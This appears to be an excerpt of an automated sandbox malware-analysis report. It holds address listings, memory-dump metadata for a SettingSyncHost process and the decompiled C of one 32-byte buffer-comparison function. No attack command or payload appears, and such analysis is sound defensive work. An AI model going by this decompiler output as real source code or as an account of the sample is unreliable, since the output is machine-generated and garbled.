                                                                                                                                      0x0039dc3a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dc48
                                                                                                                                      0x0039dc4a
                                                                                                                                      0x0039d865
                                                                                                                                      0x0039d86d
                                                                                                                                      0x0039d86f
                                                                                                                                      0x0039d485
                                                                                                                                      0x0039d48d
                                                                                                                                      0x0039d48f
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d0cd
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039d87c
                                                                                                                                      0x0039d882
                                                                                                                                      0x0039dc63
                                                                                                                                      0x0039dc63
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d888
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d888
                                                                                                                                      0x0039d882
                                                                                                                                      0x0039dc57
                                                                                                                                      0x0039dc5d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dc5d
                                                                                                                                      0x0039dbc8
                                                                                                                                      0x0039dbca
                                                                                                                                      0x0039dbdf
                                                                                                                                      0x0039dbe7
                                                                                                                                      0x0039dbe9
                                                                                                                                      0x0039dbfe
                                                                                                                                      0x0039dc06
                                                                                                                                      0x0039dc08
                                                                                                                                      0x0039dc1d
                                                                                                                                      0x0039dc25
                                                                                                                                      0x0039dc27
                                                                                                                                      0x0039dc30
                                                                                                                                      0x0039dc30
                                                                                                                                      0x0039dc30
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dc27
                                                                                                                                      0x0039dc11
                                                                                                                                      0x0039dc11
                                                                                                                                      0x0039dc17
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dc17
                                                                                                                                      0x0039dbf2
                                                                                                                                      0x0039dbf2
                                                                                                                                      0x0039dbf8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dbf8
                                                                                                                                      0x0039dbd3
                                                                                                                                      0x0039dbd3
                                                                                                                                      0x0039dbd9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dbd9
                                                                                                                                      0x0039db41
                                                                                                                                      0x0039db43
                                                                                                                                      0x0039db58
                                                                                                                                      0x0039db60
                                                                                                                                      0x0039db62
                                                                                                                                      0x0039db77
                                                                                                                                      0x0039db7f
                                                                                                                                      0x0039db81
                                                                                                                                      0x0039db96
                                                                                                                                      0x0039db9e
                                                                                                                                      0x0039dba0
                                                                                                                                      0x0039dba9
                                                                                                                                      0x0039dba9
                                                                                                                                      0x0039dba9
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dba0
                                                                                                                                      0x0039db8a
                                                                                                                                      0x0039db8a
                                                                                                                                      0x0039db90
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db90
                                                                                                                                      0x0039db6b
                                                                                                                                      0x0039db6b
                                                                                                                                      0x0039db71
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db71
                                                                                                                                      0x0039db4c
                                                                                                                                      0x0039db4c
                                                                                                                                      0x0039db52
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db52
                                                                                                                                      0x0039daba
                                                                                                                                      0x0039dabc
                                                                                                                                      0x0039dad1
                                                                                                                                      0x0039dad9
                                                                                                                                      0x0039dadb
                                                                                                                                      0x0039daf0
                                                                                                                                      0x0039daf8
                                                                                                                                      0x0039dafa
                                                                                                                                      0x0039db0f
                                                                                                                                      0x0039db17
                                                                                                                                      0x0039db19
                                                                                                                                      0x0039db22
                                                                                                                                      0x0039db22
                                                                                                                                      0x0039db22
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db19
                                                                                                                                      0x0039db03
                                                                                                                                      0x0039db03
                                                                                                                                      0x0039db09
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db09
                                                                                                                                      0x0039dae4
                                                                                                                                      0x0039dae4
                                                                                                                                      0x0039daea
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039daea
                                                                                                                                      0x0039dac5
                                                                                                                                      0x0039dac5
                                                                                                                                      0x0039dacb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dacb
                                                                                                                                      0x0039da32
                                                                                                                                      0x0039da34
                                                                                                                                      0x0039da49
                                                                                                                                      0x0039da51
                                                                                                                                      0x0039da53
                                                                                                                                      0x0039da68
                                                                                                                                      0x0039da70
                                                                                                                                      0x0039da72
                                                                                                                                      0x0039da87
                                                                                                                                      0x0039da8f
                                                                                                                                      0x0039da91
                                                                                                                                      0x0039da9a
                                                                                                                                      0x0039da9a
                                                                                                                                      0x0039da9a
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da91
                                                                                                                                      0x0039da7b
                                                                                                                                      0x0039da7b
                                                                                                                                      0x0039da81
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da81
                                                                                                                                      0x0039da5c
                                                                                                                                      0x0039da5c
                                                                                                                                      0x0039da62
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da62
                                                                                                                                      0x0039da3d
                                                                                                                                      0x0039da3d
                                                                                                                                      0x0039da43
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da43
                                                                                                                                      0x0039d9ab
                                                                                                                                      0x0039d9ad
                                                                                                                                      0x0039d9c2
                                                                                                                                      0x0039d9ca
                                                                                                                                      0x0039d9cc
                                                                                                                                      0x0039d9e1
                                                                                                                                      0x0039d9e9
                                                                                                                                      0x0039d9eb
                                                                                                                                      0x0039da00
                                                                                                                                      0x0039da08
                                                                                                                                      0x0039da0a
                                                                                                                                      0x0039da13
                                                                                                                                      0x0039da13
                                                                                                                                      0x0039da13
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da0a
                                                                                                                                      0x0039d9f4
                                                                                                                                      0x0039d9f4
                                                                                                                                      0x0039d9fa
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d9fa
                                                                                                                                      0x0039d9d5
                                                                                                                                      0x0039d9d5
                                                                                                                                      0x0039d9db
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d9db
                                                                                                                                      0x0039d9b6
                                                                                                                                      0x0039d9b6
                                                                                                                                      0x0039d9bc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d9bc
                                                                                                                                      0x0039d924
                                                                                                                                      0x0039d926
                                                                                                                                      0x0039d93b
                                                                                                                                      0x0039d943
                                                                                                                                      0x0039d945
                                                                                                                                      0x0039d95a
                                                                                                                                      0x0039d962
                                                                                                                                      0x0039d964
                                                                                                                                      0x0039d979
                                                                                                                                      0x0039d981
                                                                                                                                      0x0039d983
                                                                                                                                      0x0039d98c
                                                                                                                                      0x0039d98c
                                                                                                                                      0x0039d98c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d983
                                                                                                                                      0x0039d96d
                                                                                                                                      0x0039d96d
                                                                                                                                      0x0039d973
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d973
                                                                                                                                      0x0039d94e
                                                                                                                                      0x0039d94e
                                                                                                                                      0x0039d954
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d954
                                                                                                                                      0x0039d92f
                                                                                                                                      0x0039d92f
                                                                                                                                      0x0039d935
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d895
                                                                                                                                      0x0039d895
                                                                                                                                      0x0039d899
                                                                                                                                      0x0039d89d
                                                                                                                                      0x0039d89f
                                                                                                                                      0x0039d8b4
                                                                                                                                      0x0039d8b4
                                                                                                                                      0x0039d8b8
                                                                                                                                      0x0039d8bc
                                                                                                                                      0x0039d8be
                                                                                                                                      0x0039d8d3
                                                                                                                                      0x0039d8d3
                                                                                                                                      0x0039d8d7
                                                                                                                                      0x0039d8db
                                                                                                                                      0x0039d8dd
                                                                                                                                      0x0039d8f2
                                                                                                                                      0x0039d8f2
                                                                                                                                      0x0039d8f6
                                                                                                                                      0x0039d8fa
                                                                                                                                      0x0039d8fc
                                                                                                                                      0x0039d8fe
                                                                                                                                      0x0039d905
                                                                                                                                      0x0039d905
                                                                                                                                      0x0039d905
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8fc
                                                                                                                                      0x0039d8df
                                                                                                                                      0x0039d8e3
                                                                                                                                      0x0039d8e6
                                                                                                                                      0x0039d8e6
                                                                                                                                      0x0039d8ec
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8ec
                                                                                                                                      0x0039d8c0
                                                                                                                                      0x0039d8c4
                                                                                                                                      0x0039d8c7
                                                                                                                                      0x0039d8c7
                                                                                                                                      0x0039d8cd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8cd
                                                                                                                                      0x0039d8a1
                                                                                                                                      0x0039d8a5
                                                                                                                                      0x0039d8a8
                                                                                                                                      0x0039d8a8
                                                                                                                                      0x0039d8ae
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8ae
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                      • Instruction ID: f8382b914fd7e335699decde436014212a01739b34e53797ea12addd0bfc0150
                                                                                                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                      • Instruction Fuzzy Hash: 60C17C73D1E5B2098F37462E545923BEEA26E91B8131FC3A5DCD03F68DC222AD11A6D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039D4A5, Relevance: .3, Instructions: 349COMMONCrypto
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039D4A5(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t200;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t205;
				signed int _t210;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t324;
				void* _t326;
				void* _t328;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t284 = 0;
					L15:
					if(_t284 != 0) {
						goto L1;
					}
					_t200 =  *(_t191 - 0x1a);
					if(_t200 ==  *(_t195 - 0x1a)) {
						_t284 = 0;
						L26:
						if(_t284 != 0) {
							goto L1;
						}
						_t201 =  *(_t191 - 0x16);
						if(_t201 ==  *(_t195 - 0x16)) {
							_t284 = 0;
							L37:
							if(_t284 != 0) {
								goto L1;
							}
							_t202 =  *(_t191 - 0x12);
							if(_t202 ==  *(_t195 - 0x12)) {
								_t284 = 0;
								L48:
								if(_t284 != 0) {
									goto L1;
								}
								_t203 =  *(_t191 - 0xe);
								if(_t203 ==  *(_t195 - 0xe)) {
									_t284 = 0;
									L59:
									if(_t284 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t284 = 0;
										L70:
										if(_t284 != 0) {
											goto L1;
										}
										_t205 =  *(_t191 - 6);
										if(_t205 ==  *(_t195 - 6)) {
											_t284 = 0;
											L81:
											if(_t284 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t287 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
													_t192 = (_t192 > 0) + _t8;
												}
												goto L3;
											}
											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
											if(_t210 != 0) {
												_t192 = _t210;
												goto L3;
											}
											goto L4;
										}
										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t289 == 0) {
											L74:
											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t291 == 0) {
												L76:
												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t293 == 0) {
													L78:
													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t284 != 0) {
														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
														_t284 = (_t284 > 0) + _t182;
													}
													goto L81;
												}
												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
												_t284 = (_t293 > 0) + _t176;
												if(_t284 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
											_t284 = (_t291 > 0) + _t170;
											if(_t284 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
										_t284 = (_t289 > 0) + _t164;
										if(_t284 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t296 == 0) {
										L63:
										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t298 == 0) {
											L65:
											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t300 == 0) {
												L67:
												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t284 != 0) {
													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
													_t284 = (_t284 > 0) + _t157;
												}
												goto L70;
											}
											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
											_t284 = (_t300 > 0) + _t151;
											if(_t284 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
										_t284 = (_t298 > 0) + _t145;
										if(_t284 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
									_t284 = (_t296 > 0) + _t139;
									if(_t284 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t303 == 0) {
									L52:
									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t305 == 0) {
										L54:
										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t307 == 0) {
											L56:
											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t284 != 0) {
												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
												_t284 = (_t284 > 0) + _t131;
											}
											goto L59;
										}
										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
										_t284 = (_t307 > 0) + _t125;
										if(_t284 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
									_t284 = (_t305 > 0) + _t119;
									if(_t284 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
								_t284 = (_t303 > 0) + _t113;
								if(_t284 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t284 != 0) {
											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
											_t284 = (_t284 > 0) + _t106;
										}
										goto L48;
									}
									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
									_t284 = (_t314 > 0) + _t100;
									if(_t284 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
								_t284 = (_t312 > 0) + _t94;
								if(_t284 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
							_t284 = (_t310 > 0) + _t88;
							if(_t284 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t317 == 0) {
							L30:
							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t319 == 0) {
								L32:
								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t321 == 0) {
									L34:
									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t284 != 0) {
										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
										_t284 = (_t284 > 0) + _t81;
									}
									goto L37;
								}
								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
								_t284 = (_t321 > 0) + _t75;
								if(_t284 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
							_t284 = (_t319 > 0) + _t69;
							if(_t284 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
						_t284 = (_t317 > 0) + _t63;
						if(_t284 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t324 == 0) {
						L19:
						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t326 == 0) {
							L21:
							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t328 == 0) {
								L23:
								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t284 != 0) {
									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
									_t284 = (_t284 > 0) + _t56;
								}
								goto L26;
							}
							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
							_t284 = (_t328 > 0) + _t50;
							if(_t284 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
						_t284 = (_t326 > 0) + _t44;
						if(_t284 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
					_t284 = (_t324 > 0) + _t38;
					if(_t284 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}
































                                                                                                                                      0x0039d4a5
                                                                                                                                      0x0039d4a5
                                                                                                                                      0x0039d4ab
                                                                                                                                      0x0039d522
                                                                                                                                      0x0039d524
                                                                                                                                      0x0039d526
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d52c
                                                                                                                                      0x0039d532
                                                                                                                                      0x0039d5a9
                                                                                                                                      0x0039d5ab
                                                                                                                                      0x0039d5ad
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d5b3
                                                                                                                                      0x0039d5b9
                                                                                                                                      0x0039d630
                                                                                                                                      0x0039d632
                                                                                                                                      0x0039d634
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d63a
                                                                                                                                      0x0039d640
                                                                                                                                      0x0039d6b7
                                                                                                                                      0x0039d6b9
                                                                                                                                      0x0039d6bb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d6c1
                                                                                                                                      0x0039d6c7
                                                                                                                                      0x0039d73e
                                                                                                                                      0x0039d740
                                                                                                                                      0x0039d742
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d74e
                                                                                                                                      0x0039d7c6
                                                                                                                                      0x0039d7c8
                                                                                                                                      0x0039d7ca
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d7d0
                                                                                                                                      0x0039d7d6
                                                                                                                                      0x0039d84d
                                                                                                                                      0x0039d84f
                                                                                                                                      0x0039d851
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d85f
                                                                                                                                      0x0039d0cb
                                                                                                                                      0x0039d0cd
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039d86d
                                                                                                                                      0x0039d86f
                                                                                                                                      0x0039d485
                                                                                                                                      0x0039d48d
                                                                                                                                      0x0039d48f
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d49c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d48f
                                                                                                                                      0x0039d87c
                                                                                                                                      0x0039d882
                                                                                                                                      0x0039dc63
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dc63
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d888
                                                                                                                                      0x0039d7df
                                                                                                                                      0x0039d7e1
                                                                                                                                      0x0039d7f6
                                                                                                                                      0x0039d7fe
                                                                                                                                      0x0039d800
                                                                                                                                      0x0039d815
                                                                                                                                      0x0039d81d
                                                                                                                                      0x0039d81f
                                                                                                                                      0x0039d834
                                                                                                                                      0x0039d83c
                                                                                                                                      0x0039d83e
                                                                                                                                      0x0039d847
                                                                                                                                      0x0039d847
                                                                                                                                      0x0039d847
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d83e
                                                                                                                                      0x0039d828
                                                                                                                                      0x0039d828
                                                                                                                                      0x0039d82e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d82e
                                                                                                                                      0x0039d809
                                                                                                                                      0x0039d809
                                                                                                                                      0x0039d80f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d80f
                                                                                                                                      0x0039d7ea
                                                                                                                                      0x0039d7ea
                                                                                                                                      0x0039d7f0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d7f0
                                                                                                                                      0x0039d758
                                                                                                                                      0x0039d75a
                                                                                                                                      0x0039d76f
                                                                                                                                      0x0039d777
                                                                                                                                      0x0039d779
                                                                                                                                      0x0039d78e
                                                                                                                                      0x0039d796
                                                                                                                                      0x0039d798
                                                                                                                                      0x0039d7ad
                                                                                                                                      0x0039d7b5
                                                                                                                                      0x0039d7b7
                                                                                                                                      0x0039d7c0
                                                                                                                                      0x0039d7c0
                                                                                                                                      0x0039d7c0
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d7b7
                                                                                                                                      0x0039d7a1
                                                                                                                                      0x0039d7a1
                                                                                                                                      0x0039d7a7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d7a7
                                                                                                                                      0x0039d782
                                                                                                                                      0x0039d782
                                                                                                                                      0x0039d788
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d788
                                                                                                                                      0x0039d763
                                                                                                                                      0x0039d763
                                                                                                                                      0x0039d769
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d769
                                                                                                                                      0x0039d6d0
                                                                                                                                      0x0039d6d2
                                                                                                                                      0x0039d6e7
                                                                                                                                      0x0039d6ef
                                                                                                                                      0x0039d6f1
                                                                                                                                      0x0039d706
                                                                                                                                      0x0039d70e
                                                                                                                                      0x0039d710
                                                                                                                                      0x0039d725
                                                                                                                                      0x0039d72d
                                                                                                                                      0x0039d72f
                                                                                                                                      0x0039d738
                                                                                                                                      0x0039d738
                                                                                                                                      0x0039d738
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d72f
                                                                                                                                      0x0039d719
                                                                                                                                      0x0039d719
                                                                                                                                      0x0039d71f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d71f
                                                                                                                                      0x0039d6fa
                                                                                                                                      0x0039d6fa
                                                                                                                                      0x0039d700
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d700
                                                                                                                                      0x0039d6db
                                                                                                                                      0x0039d6db
                                                                                                                                      0x0039d6e1
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d6e1
                                                                                                                                      0x0039d649
                                                                                                                                      0x0039d64b
                                                                                                                                      0x0039d660
                                                                                                                                      0x0039d668
                                                                                                                                      0x0039d66a
                                                                                                                                      0x0039d67f
                                                                                                                                      0x0039d687
                                                                                                                                      0x0039d689
                                                                                                                                      0x0039d69e
                                                                                                                                      0x0039d6a6
                                                                                                                                      0x0039d6a8
                                                                                                                                      0x0039d6b1
                                                                                                                                      0x0039d6b1
                                                                                                                                      0x0039d6b1
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d6a8
                                                                                                                                      0x0039d692
